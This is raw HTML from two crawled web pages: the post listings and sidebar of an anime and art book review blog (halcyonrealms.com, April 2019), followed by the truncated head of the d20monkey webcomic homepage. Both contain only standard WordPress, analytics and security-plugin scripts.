to The Mood Is Already Of War 3 &#8211; Otomo Katsuhiro Manga Review">The Mood Is Already Of War 3 &#8211; Otomo Katsuhiro Manga Review</a></h2> <div class="top-tools"></div> <div class="entry"> <p><a href="http://halcyonrealms.com/books/the-mood-is-already-of-war-3-chapter-1-otomo-katsuhiro-manga-review/"><img class="alignnone size-medium" title="The Mood Is Already Of War 3 - Otomo Katsuhiro Manga Review" src="https://i0.wp.com/halcyonrealms.com/blogpics/kibunsenso301.jpg?resize=750%2C500" alt="The Mood Is Already Of War 3 Chapter 1 - Otomo Katsuhiro Manga Review" width="750" height="500" data-recalc-dims="1" /></a> <a href="http://halcyonrealms.com/books/the-mood-is-already-of-war-3-chapter-1-otomo-katsuhiro-manga-review/#more-79405" class="more-link"><span aria-label="Continue reading The Mood Is Already Of War 3 &#8211; Otomo Katsuhiro Manga Review">(more&hellip;)</span></a></p> </div> <div class="tools"><div class="float-left"><span><span>Apr 30th 2019</span> </div><div class="float-right"> <a href="http://halcyonrealms.com/books/the-mood-is-already-of-war-3-chapter-1-otomo-katsuhiro-manga-review/#comments"><span>Comments</span> (4)</a></div></div> </div> </div> <div class="post col2" id="post-78963"> <h2 class="link" height ="40"><a href="http://halcyonrealms.com/illustration/avengers-endgame-ukiyo-e-style/" rel="bookmark" title="Permanent Link to Avengers : Endgame &#8211; Ukiyo-e Style">Avengers : Endgame &#8211; Ukiyo-e Style</a></h2> <div class="top-tools"></div> <div class="entry"> <p><a href="http://halcyonrealms.com/illustration/avengers-endgame-ukiyo-e-style/"><img src="https://i1.wp.com/halcyonrealms.com/blogpics/avengersukiyoe01.jpg?resize=750%2C500" width="750" height="500" alt="Avengers : Endgame - Ukiyo-e Style" title="Avengers : Endgame - Ukiyo-e Style" class="alignnone size-medium" data-recalc-dims="1" /></a> <a href="http://halcyonrealms.com/illustration/avengers-endgame-ukiyo-e-style/#more-78963" class="more-link"><span aria-label="Continue reading Avengers : Endgame &#8211; Ukiyo-e Style">(more&hellip;)</span></a></p> </div> <div class="tools"><div class="float-left"><span><span>Apr 27th 2019</span> </div><div class="float-right"> <a href="http://halcyonrealms.com/illustration/avengers-endgame-ukiyo-e-style/#respond"><span>Comments</span> (0)</a></div></div> </div> <div class="row"> <div class="post col1" id="post-78202"> <h2 class="link" height ="40"><a href="http://halcyonrealms.com/books/real-size-katsuya-terada-art-book-review/" rel="bookmark" title="Permanent Link to Real Size &#8211; Katsuya Terada Art Book Review">Real Size &#8211; Katsuya Terada Art Book Review</a></h2> <div class="top-tools"></div> <div class="entry"> <p><a href="http://halcyonrealms.com/books/real-size-katsuya-terada-art-book-review/"><img src="https://i2.wp.com/halcyonrealms.com/blogpics/teradarealsize21.jpg?resize=750%2C500" width="750" height="500" alt="Real Size - Katsuya Terada Art Book Review" title="Real Size - Katsuya Terada Art Book Review" class="alignnone size-medium" data-recalc-dims="1" /></a> <a href="http://halcyonrealms.com/books/real-size-katsuya-terada-art-book-review/#more-78202" class="more-link"><span aria-label="Continue reading Real Size &#8211; Katsuya Terada Art Book Review">(more&hellip;)</span></a></p> </div> <div class="tools"><div class="float-left"><span><span>Apr 23rd 2019</span> </div><div class="float-right"> <a href="http://halcyonrealms.com/books/real-size-katsuya-terada-art-book-review/#comments"><span>Comments</span> (5)</a></div></div> </div> </div> <div class="post col2" id="post-77897"> <h2 class="link" height ="40"><a href="http://halcyonrealms.com/books/eguchi-hisashi-illustration-magazine-review/" rel="bookmark" title="Permanent Link to Eguchi Hisashi – Illustration Magazine Review">Eguchi Hisashi – Illustration Magazine Review</a></h2> <div class="top-tools"></div> <div class="entry"> <p><a href="http://halcyonrealms.com/books/eguchi-hisashi-illustration-magazine-review/"><img class="alignnone size-medium" title="Eguchi Hisashi – Illustration Magazine Review" src="https://i2.wp.com/halcyonrealms.com/blogpics/eguchillust02.jpg?resize=750%2C500" alt="Eguchi Hisashi – Illustration Magazine Review" width="750" height="500" data-recalc-dims="1" /></a> <a href="http://halcyonrealms.com/books/eguchi-hisashi-illustration-magazine-review/#more-77897" class="more-link"><span aria-label="Continue reading Eguchi Hisashi – Illustration Magazine Review">(more&hellip;)</span></a></p> </div> <div class="tools"><div class="float-left"><span><span>Apr 20th 2019</span> </div><div class="float-right"> <a href="http://halcyonrealms.com/books/eguchi-hisashi-illustration-magazine-review/#comments"><span>Comments</span> (2)</a></div></div> </div> <div class="row"> <div class="post col1" id="post-76715"> <h2 class="link" height ="40"><a href="http://halcyonrealms.com/books/100-views-yamamoto-nizo-background-art-book-review/" rel="bookmark" title="Permanent Link to 100 Views &#8211; Yamamoto Nizo Background Art Book Review">100 Views &#8211; Yamamoto Nizo Background Art Book Review</a></h2> <div class="top-tools"></div> <div class="entry"> <p><a href="http://halcyonrealms.com/books/100-views-yamamoto-nizo-background-art-book-review/"><img src="https://i1.wp.com/halcyonrealms.com/blogpics/ynizoab21.jpg?resize=750%2C500" width="750" height="500" alt="100 Views - Yamamoto Nizo Background Art Book Review" title="100 Views - Yamamoto Nizo Background Art Book Review" class="alignnone size-medium" data-recalc-dims="1" /></a> <a href="http://halcyonrealms.com/books/100-views-yamamoto-nizo-background-art-book-review/#more-76715" class="more-link"><span aria-label="Continue reading 100 Views &#8211; Yamamoto Nizo Background Art Book Review">(more&hellip;)</span></a></p> </div> <div class="tools"><div class="float-left"><span><span>Apr 16th 2019</span> </div><div class="float-right"> <a href="http://halcyonrealms.com/books/100-views-yamamoto-nizo-background-art-book-review/#comments"><span>Comments</span> (5)</a></div></div> </div> </div> <div class="post col2" id="post-76692"> <h2 class="link" height ="40"><a href="http://halcyonrealms.com/books/edward-burne-jones-art-book-review/" rel="bookmark" title="Permanent Link to Edward Burne-Jones Art Book Review">Edward Burne-Jones Art Book Review</a></h2> <div class="top-tools"></div> <div class="entry"> <p><a href="http://halcyonrealms.com/books/edward-burne-jones-art-book-review/"><img src="https://i2.wp.com/halcyonrealms.com/blogpics/edwardjones01.jpg?resize=750%2C500" width="750" height="500" alt="Edward Burne-Jones Art Book" title="Edward Burne-Jones Art Book" class="alignnone size-medium" data-recalc-dims="1" /></a> <a href="http://halcyonrealms.com/books/edward-burne-jones-art-book-review/#more-76692" class="more-link"><span aria-label="Continue reading Edward Burne-Jones Art Book Review">(more&hellip;)</span></a></p> </div> <div class="tools"><div class="float-left"><span><span>Apr 11th 2019</span> </div><div class="float-right"> <a href="http://halcyonrealms.com/books/edward-burne-jones-art-book-review/#comments"><span>Comments</span> (2)</a></div></div> </div> <div class="row"> <div class="post col1" id="post-75980"> <h2 class="link" height ="40"><a href="http://halcyonrealms.com/mangacomics/new-katsuhiro-otomo-manga-the-mood-is-already-of-war-sequel/" rel="bookmark" title="Permanent Link to New Katsuhiro Otomo Manga &#8211; The Mood Is Already Of War Sequel">New Katsuhiro Otomo Manga &#8211; The Mood Is Already Of War Sequel</a></h2> <div class="top-tools"></div> <div class="entry"> <p><a href="http://halcyonrealms.com/mangacomics/new-katsuhiro-otomo-manga-the-mood-is-already-of-war-sequel/"><img src="https://i1.wp.com/halcyonrealms.com/blogpics/moodofwar01.jpg?resize=750%2C500" width="750" height="500" alt="New Katsuhiro Otomo Manga - The Mood Is Already Of War Sequel" title="New Katsuhiro Otomo Manga - The Mood Is Already Of War Sequel" class="alignnone size-medium" data-recalc-dims="1" /></a> <a href="http://halcyonrealms.com/mangacomics/new-katsuhiro-otomo-manga-the-mood-is-already-of-war-sequel/#more-75980" class="more-link"><span aria-label="Continue reading New Katsuhiro Otomo Manga &#8211; The Mood Is Already Of War Sequel">(more&hellip;)</span></a></p> </div> <div class="tools"><div class="float-left"><span><span>Apr 8th 2019</span> </div><div class="float-right"> <a href="http://halcyonrealms.com/mangacomics/new-katsuhiro-otomo-manga-the-mood-is-already-of-war-sequel/#comments"><span>Comments</span> (6)</a></div></div> </div> </div> <div class="post col2" id="post-74831"> <h2 class="link" height ="40"><a href="http://halcyonrealms.com/books/japanese-bathhouses-illustrated-guide-enya-honami-book-review/" rel="bookmark" title="Permanent Link to Japanese Bathhouses Illustrated Guide &#8211; Enya Honami Book Review">Japanese Bathhouses Illustrated Guide &#8211; Enya Honami Book Review</a></h2> <div class="top-tools"></div> <div class="entry"> <p><a href="http://halcyonrealms.com/books/japanese-bathhouses-illustrated-guide-enya-honami-book-review/"><img class="alignnone size-medium" title="Japanese Bathhouses Illustrated Guide - Enya Honami Book Review" src="https://i0.wp.com/halcyonrealms.com/blogpics/sentozukai01.jpg?resize=750%2C500" alt="Japanese Bathhouses Illustrated Guide - Enya Honami Book Review" width="750" height="500" data-recalc-dims="1" /></a> <a href="http://halcyonrealms.com/books/japanese-bathhouses-illustrated-guide-enya-honami-book-review/#more-74831" class="more-link"><span aria-label="Continue reading Japanese Bathhouses Illustrated Guide &#8211; Enya Honami Book Review">(more&hellip;)</span></a></p> </div> <div class="tools"><div class="float-left"><span><span>Apr 2nd 2019</span> </div><div class="float-right"> <span>Comments Off<span class="screen-reader-text"> on Japanese Bathhouses Illustrated Guide &#8211; Enya Honami Book Review</span></span></div></div> </div> <div class='wp-pagenavi'> <span class='pages'>Page 1 of 120</span><span class='current'>1</span><a class="page larger" href="http://halcyonrealms.com/page/2/">2</a><a class="page larger" href="http://halcyonrealms.com/page/3/">3</a><a class="page larger" href="http://halcyonrealms.com/page/4/">4</a><a class="page larger" href="http://halcyonrealms.com/page/5/">5</a><a class="page larger" href="http://halcyonrealms.com/page/6/">6</a><a class="page larger" href="http://halcyonrealms.com/page/7/">7</a><a class="page larger" href="http://halcyonrealms.com/page/8/">8</a><a class="page larger" href="http://halcyonrealms.com/page/9/">9</a><a class="page larger" href="http://halcyonrealms.com/page/10/">10</a><span class='extend'>...</span><a class="larger page" href="http://halcyonrealms.com/page/20/">20</a><span class='extend'>...</span><a class="nextpostslink" rel="next" href="http://halcyonrealms.com/page/2/">»</a><a class="last" href="http://halcyonrealms.com/page/120/">Last »</a> </div> <BR> <iframe src="http://rcm-na.amazon-adsystem.com/e/cm?t=halcreal-20&o=1&p=48&l=ur1&category=dvd&banner=1FPD5WCC2MS0HE348382&f=ifr&linkID=HANZGJQ6ZT5GGUBL" width="728" height="90" scrolling="no" border="0" marginwidth="0" style="border:none;" frameborder="0"></iframe> </div> <div id="sidebar-contain"> <div class="side-box"><form method="get" id="searchform" action="http://halcyonrealms.com/"> <label class="hidden" for="s"></label> <div><input type="text" value="" name="s" id="s" /> <input type="submit" id="searchsubmit" value="search" /> </div> </form> </div><div class="side-box"> <div class="textwidget"><a href="https://www.facebook.com/hrealms"><img src="https://i1.wp.com/cdn.halcyonrealms.com/blogpics/socicon48_facebook.png" alt="Follow Halcyon Realms on Facebook" title="Follow Halcyon Realms on Facebook" data-recalc-dims="1"/></a><a href="http://www.twitter.com/blauereiter"><img src="https://i2.wp.com/cdn.halcyonrealms.com/blogpics/socicon48_twitter.png" alt="Follow Halcyon Realms on Twitter" title="Follow Halcyon Realms on Twitter" data-recalc-dims="1"/></a><a href="https://www.instagram.com/halcyonrealmsbooks/"><img src="https://i0.wp.com/cdn.halcyonrealms.com/blogpics/socicon48_instagram.png" alt="Follow Halcyon Realms on Instagram" title="Follow Halcyon Realms on Instagram" data-recalc-dims="1"/></a><a href="http://pinterest.com/blauereiter/"><img src="https://i2.wp.com/cdn.halcyonrealms.com/blogpics/socicon48_pinterest.png" alt="Follow Halcyon Realms on Pinterest" title="Follow Halcyon Realms on Pinterest" data-recalc-dims="1"/></a><a href="http://halcyonrealms.tumblr.com/"><img src="https://i1.wp.com/cdn.halcyonrealms.com/blogpics/socicon48_tumblr.png" alt="Follow Halcyon Realms on tumblr" title="Follow Halcyon Realms on tumblr" data-recalc-dims="1"/></a><a href="https://plus.google.com/+blauereiterder/posts"><img src="https://i1.wp.com/cdn.halcyonrealms.com/blogpics/socicon48_gplus.png" alt="Follow Halcyon Realms on G+" title="Follow Halcyon Realms on G+" data-recalc-dims="1"/></a><a href="http://cdn.halcyonrealms.com/subscribe/"></div> </div><div class="side-box"> <div class="textwidget"><a href="http://halcyonrealms.com/store/"><img src="https://i1.wp.com/cdn.halcyonrealms.com/blogpics/bookreviewbannerbig.jpg" alt="Art book reviews banner link" title="Art book reviews banner link" data-recalc-dims="1">&nbsp;&nbsp;&nbsp;<a href="http://halcyonrealms.com/books/how-to-order-from-amazon-japan-a-detailed-buying-guide/"><img src="https://i2.wp.com/cdn.halcyonrealms.com/blogpics/amzbuyguidebig2.jpg" alt="How to order from Amazon Japan - Detailed Buying guide" title="How to order from Amazon Japan - Detailed Buying guide" data-recalc-dims="1"></A> <BR></div> </div><div class="side-box"><h3 class="widgettitle">Categories</h3> <div class="textwidget"><div style='float:left; width:50%;'> <ul> <li><a href="http://halcyonrealms.com/category/animation/">Animation</a></li> <li><a href="http://halcyonrealms.com/category/anime/">Anime</a></li> <li><a href="http://halcyonrealms.com/category/art/">Art</a></li> <li><a href="http://halcyonrealms.com/category/bluraydvds/">Blu-ray/dvds</a></li> <li><a href="http://halcyonrealms.com/category/books/">Book Reviews</a></li> <li><a href="http://halcyonrealms.com/category/cg3d/">CG</a></li> <li><a href="http://halcyonrealms.com/category/characterdesign/">Character Design</a></li> <li><a href="http://halcyonrealms.com/category/cinematography/">Cinematography</a></li> <li><a href="http://halcyonrealms.com/category/commercials/">Commercials</a></li> <li><a href="http://halcyonrealms.com/category/conceptart/">Concept Art</a></li> <li><a href="http://halcyonrealms.com/category/drawing/">Drawing</a></li> </ul> </div> <div style='float:right; width:50%'> <ul> <li><a href="http://halcyonrealms.com/category/film/">Film</a></li> <li><a href="http://halcyonrealms.com/category/games">Games</a></li> <li><a href="http://halcyonrealms.com/category/ghibli/">Ghibli</a></li> <li><a href="http://halcyonrealms.com/category/illustration/">Illustration</a></li> <li><a href="http://halcyonrealms.com/category/japan/">Japan</a></li> <li><a href="http://halcyonrealms.com/category/mangacomics/">Manga/Comics</a></li> <li><a href="http://halcyonrealms.com/category/mecha/">Mecha</a></li> <li><a href="http://halcyonrealms.com/category/music/">Music</a></li> <li><a href="http://halcyonrealms.com/category/painting/">Painting</a></li> <li><a href="http://halcyonrealms.com/category/photography/">Photography</a></li> <li><a href="http://halcyonrealms.com/category/travel/">Travel</a></li> </ul> </div></div> </div><div class="side-box"> <div id="fb-root"></div> <div class="fb-page" data-href="https://www.facebook.com/hrealms" data-width="302" data-height="235" data-hide-cover="false" data-show-facepile="true" data-show-posts="false"> <div class="fb-xfbml-parse-ignore"><blockquote cite="https://www.facebook.com/hrealms"><a href="https://www.facebook.com/hrealms"></a></blockquote></div> </div> </div><!-- Start Posts in Sidebar - pis_posts_in_sidebar-2 --><div class="side-box"><h3 class="widgettitle">Artbook Reviews</h3> <ul class="pis-ul"><li class="pis-li"><p class="pis-title"><a class="pis-title-link" href="http://halcyonrealms.com/illustration/otomo-katsuhiros-hansel-and-gretel-comic-book/" title="Permalink to Otomo Katsuhiro&#8217;s Hansel And Gretel Comic Book" rel="bookmark">Otomo Katsuhiro&#8217;s Hansel And Gretel Comic Book</a></p><p class="pis-custom-field"><span class="pis-custom-field-value"><a href="http://halcyonrealms.com/illustration/otomo-katsuhiros-hansel-and-gretel-comic-book/"><img class="alignnone" src="http://cdn.halcyonrealms.com/wp-content/uploads/2012/03/hanselgretel01.jpg" alt="" width="302" height="201"/></a></span></p></li><li class="pis-li"><p class="pis-title"><a class="pis-title-link" href="http://halcyonrealms.com/anime/studio-ghibli-brutus-magazine-special-part-i/" title="Permalink to Studio Ghibli &#8211; Brutus Magazine Special Part I" rel="bookmark">Studio Ghibli &#8211; Brutus Magazine Special Part I</a></p><p class="pis-custom-field"><span class="pis-custom-field-value"><a href="http://halcyonrealms.com/anime/studio-ghibli-brutus-magazine-special-part-i/"><img src="http://cdn.halcyonrealms.com/wp-content/uploads/2011/07/brutusghibli02.jpg" alt="" width="302" height="201"/></a></span></p></li><li class="pis-li"><p class="pis-title"><a class="pis-title-link" href="http://halcyonrealms.com/art/world-war-robot-ashley-wood-art-book-review/" title="Permalink to World War Robot &#8211; Ashley Wood Art Book Review" rel="bookmark">World War Robot &#8211; Ashley Wood Art Book Review</a></p><p class="pis-custom-field"><span class="pis-custom-field-value"><a href="http://halcyonrealms.com/art/world-war-robot-ashley-wood-art-book-review/"><img class="alignnone" alt="World War Robot - Ashley Wood Art Book" title="World War Robot - Ashley Wood Art Book" src="http://halcyonrealms.com/blogpics/wwrobot01.jpg" width="302" height="201"/></a></span></p></li><li class="pis-li"><p class="pis-title"><a class="pis-title-link" href="http://halcyonrealms.com/books/the-last-odyssey-ohrai-noriyoshi-art-book-review/" title="Permalink to The Last Odyssey – Ohrai Noriyoshi 1985-2015 Art Book Review" rel="bookmark">The Last Odyssey – Ohrai Noriyoshi 1985-2015 Art Book Review</a></p><p class="pis-custom-field"><span class="pis-custom-field-value"><a href="http://halcyonrealms.com/books/the-last-odyssey-ohrai-noriyoshi-art-book-review/"><img src="http://halcyonrealms.com/blogpics/odysseyohrai01.jpg" width="302" height="201" alt="The Last Odyssey – Ohrai Noriyoshi 1985-2015 Art Book Review" title="The Last Odyssey – Ohrai Noriyoshi 1985-2015 Art Book Review" class="alignnone size-medium" /></a></span></p></li><li class="pis-li"><p class="pis-title"><a class="pis-title-link" href="http://halcyonrealms.com/anime/tekkon-kinkreet-art-book-black-kuro-side/" title="Permalink to Tekkon Kinkreet &#8211; Black / Kuro Side Art Book Review" rel="bookmark">Tekkon Kinkreet &#8211; Black / Kuro Side Art Book Review</a></p><p class="pis-custom-field"><span class="pis-custom-field-value"><a href="http://halcyonrealms.com/anime/tekkon-kinkreet-art-book-%E2%80%9Cblack-kuro-side%E2%80%9D/"><img src="http://cdn.halcyonrealms.com/wp-content/uploads/2010/10/tekkonkuro01.jpg" alt="" width="302" height="201"/></a></span></p></li></ul><!-- / ul#pis-ul --><!-- Generated by Posts in Sidebar v3.5 --></div><!-- End Posts in Sidebar - pis_posts_in_sidebar-2 --><div class="side-box"> <div class="textwidget"><!-- Place this tag where you want the widget to render. --> <div class="g-person" data-width="302" data-href="//plus.google.com/u/0/107652458622232226779" data-layout="landscape" data-rel="author"></div> <!-- Place this tag after the last widget tag. --> <script type="text/javascript"> (function() { var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true; po.src = 'https://apis.google.com/js/platform.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s); })(); </script></div> </div> </div> <BR> </div> <div id="footer"><ul> <span class="footerpages"> <li class="page_item page-item-2"><a href="http://halcyonrealms.com/about/">About</a></li> <li class="page_item page-item-7"><a href="http://halcyonrealms.com/store/">Art Book Reviews</a></li> <li class="page_item page-item-12027"><a href="http://halcyonrealms.com/photos/">photos</a></li> <li class="page_item page-item-6"><a href="http://halcyonrealms.com/contact/">Contact</a></li> <li class="page_item page-item-5332"><a href="http://halcyonrealms.com/archivepage/">Archives</a></li> <li class="page_item page-item-460"><a href="http://halcyonrealms.com/films/">Films</a></li> <li class="page_item page-item-6650"><a href="http://halcyonrealms.com/links/">links</a></li> <li class="page_item page-item-4"><a href="http://halcyonrealms.com/subscribe/">Subscribe</a></li> </span> </ul> <p> <!-- 14 queries. 3.098 seconds. --> The top resource for anime and Japanese art book reviews. Please ask before using any images from this site. </p> </div> </div> <div style="display:none"> </div> <script type='text/javascript' src='http://cdn.halcyonrealms.com/wp-content/plugins/jetpack/_inc/build/photon/photon.min.js?ver=20130122'></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920'></script> <script type='text/javascript'> /* <![CDATA[ */ var jpfbembed = {"appid":"249643311490","locale":"en_US"}; /* ]]> */ </script> <script type='text/javascript' src='http://cdn.halcyonrealms.com/wp-content/plugins/jetpack/_inc/build/facebook-embed.min.js'></script> <script type='text/javascript' src='http://cdn.halcyonrealms.com/wp-includes/js/wp-embed.min.js?ver=4.9.10'></script> <!-- Clicky Web Analytics - http://clicky.com, WordPress Plugin by Yoast - https://yoast.com/wordpress/plugins/clicky/ --> <script type='text/javascript'> function clicky_gc(name) { var ca = document.cookie.split(';'); for (var i in ca) { if (ca[i].indexOf(name + '=') != -1) { return decodeURIComponent(ca[i].split('=')[1]); } } return ''; } var username_check = clicky_gc('comment_author_70041ff646e6185ac4026158ebd5266e'); if (username_check) var clicky_custom_session = {username: username_check}; </script> <script type="text/javascript"> var clicky = { log : function () { return true; }, goal: function () { return true; } }; var clicky_site_id = 66591069; (function () { var s = document.createElement('script');s.type = 'text/javascript';s.async = true;s.src = '//static.getclicky.com/js'; ( document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0] ).appendChild(s); })(); </script> <noscript><p><img alt="Clicky" width="1" height="1" src="//in.getclicky.com/66591069ns.gif" /></p></noscript> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.1.1',blog:'1666144',post:'0',tz:'9',srv:'halcyonrealms.com'} ]); _stq.push([ 'clickTrackerInit', '1666144', '0' ]); </script> <script type="text/javascript"> //<![CDATA[ (function() { var _analytics_scr = document.createElement('script'); _analytics_scr.type = 'text/javascript'; _analytics_scr.async = true; _analytics_scr.src = '/_Incapsula_Resource?SWJIYLWA=719d34d31c8e3a6e6fffd425f7e032f3&ns=1&cb=1466916611'; var _analytics_elem = document.getElementsByTagName('script')[0]; _analytics_elem.parentNode.insertBefore(_analytics_scr, _analytics_elem); })(); // ]]> </script></body> </html> <!-- Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/ Object Caching 143/249 objects using disk Content Delivery Network via cdn.halcyonrealms.com Served from: halcyonrealms.com @ 2019-05-16 23:51:42 by W3 Total Cache -->
0
<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title></title> <link rel="stylesheet" href="http://www.d20monkey.com/wp-content/themes/comicpress-blank/style.css" type="text/css" media="screen" /> <link rel="pingback" href="http://www.d20monkey.com/xmlrpc.php" /> <meta name="ComicPress" content="4.4" /> <title>d20monkey &#8211; A Webcomic About Dice, Drama, and Dick Jokes</title> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//secure.gravatar.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="d20monkey &raquo; Feed" href="http://www.d20monkey.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="d20monkey &raquo; Comments Feed" href="http://www.d20monkey.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.d20monkey.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6e4916f4f2da8abd31c186c03ad23485"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='http://www.d20monkey.com/wp-includes/css/dist/block-library/style.min.css?ver=6e4916f4f2da8abd31c186c03ad23485' type='text/css' media='all' /> <link rel='stylesheet' id='mc4wp-form-basic-css' href='http://www.d20monkey.com/wp-content/plugins/mailchimp-for-wp/assets/css/form-basic.min.css?ver=4.3.3' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_css-css' href='http://www.d20monkey.com/wp-content/plugins/jetpack/css/jetpack.css?ver=7.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='comiceasel-style-css' href='http://www.d20monkey.com/wp-content/plugins/comic-easel/css/comiceasel.css?ver=6e4916f4f2da8abd31c186c03ad23485' type='text/css' media='all' /> <link rel='stylesheet' id='comiceasel-navstyle-css' href='http://www.d20monkey.com/wp-content/themes/comicpress-blank/images/nav/d20/navstyle.css?ver=6e4916f4f2da8abd31c186c03ad23485' type='text/css' media='all' /> <script type='text/javascript' src='http://www.d20monkey.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://www.d20monkey.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='http://www.d20monkey.com/wp-content/themes/comicpress/js/ddsmoothmenu.js?ver=6e4916f4f2da8abd31c186c03ad23485'></script> <script type='text/javascript' src='http://www.d20monkey.com/wp-content/themes/comicpress/js/menubar.js?ver=6e4916f4f2da8abd31c186c03ad23485'></script> <link rel='https://api.w.org/' href='http://www.d20monkey.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.d20monkey.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.d20monkey.com/wp-includes/wlwmanifest.xml" /> <link rel='shortlink' href='https://wp.me/5rxai' /> <script type="text/javascript"> (function(url){ if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; } var addEvent = function(evt, handler) { if (window.addEventListener) { document.addEventListener(evt, handler, false); } else if (window.attachEvent) { document.attachEvent('on' + evt, handler); } }; var removeEvent = function(evt, handler) { if (window.removeEventListener) { document.removeEventListener(evt, handler, false); } else if (window.detachEvent) { document.detachEvent('on' + evt, handler); } }; var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' '); var logHuman = function() { if (window.wfLogHumanRan) { return; } window.wfLogHumanRan = true; var wfscr = document.createElement('script'); wfscr.type = 'text/javascript'; wfscr.async = true; wfscr.src = url + '&r=' + Math.random(); (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr); for (var i = 0; i < evts.length; i++) { removeEvent(evts[i], logHuman); } }; for (var i = 0; i < evts.length; i++) { addEvent(evts[i], logHuman); } })('//www.d20monkey.com/?wordfence_lh=1&hid=E481584CAB776A0D51D40ACD48EB79D5'); </script><meta name="Comic-Easel" content="1.15" /> <meta name="Referrer" content="" /> <link rel='dns-prefetch' href='//v0.wordpress.com'/> <style type='text/css'>img#wpstats{display:none}</style><!--Customizer CSS--> <style type="text/css"> #page { width: 1024px; max-width: 1024px; } #add-width { width: 6px; } #content-column { width: 798px; max-width: 100%; } #sidebar-right { width: 204px; } #sidebar-left { width: 220px; } #page { background-color: #ffffff!important; } #header { background-color: #000000!important; } #menubar-wrapper { background-color: #ffffff!important; } #content-wrapper { background-color: #ffffff!important; } #footer { background-color: #000000!important; } a:link, a:visited { color: #1d314f!important; } a:visited { color: #1e73be!important; } a:visited { color: #1e73be!important; } .entry a, .blognav a, #paginav a, #pagenav a { color: #1d314f!important; } .copyright-info a { color: #ffffff!important; } .copyright-info a:hover, .blognav a:hover, #paginav a:hover { color: #0d6cbf!important; } </style> <!--/Customizer CSS--> <style type="text/css" id="custom-background-css"> body.custom-background { background-color: #000000; } </style> <!-- Jetpack Open Graph Tags --> <meta property="og:type" content="website" /> <meta property="og:title" content="d20monkey" /> <meta property="og:description" content="A Webcomic About Dice, Drama, and Dick Jokes" /> <meta property="og:url" content="http://www.d20monkey.com/" /> <meta property="og:site_name" content="d20monkey" /> <meta property="og:image" content="https://s0.wp.com/i/blank.jpg" /> <meta property="og:locale" content="en_US" /> <!-- End Jetpack Open Graph Tags --> </head> <body class="home blog custom-background user-guest chrome am day morning thu layout-2cl scheme-none"> <div id="page-wrap"> <div id="page"> <div id="header"> <div id="sidebar-header" class="sidebar"> <div id="text-70" class="widget widget_text"> <div class="widget-content"> <div class="textwidget"><div style="width: 980px; margin: 0 auto;"> <div style="float: left; padding-left: 5px; padding-top: 10px;"><a href="http://www.d20monkey.com/"><img 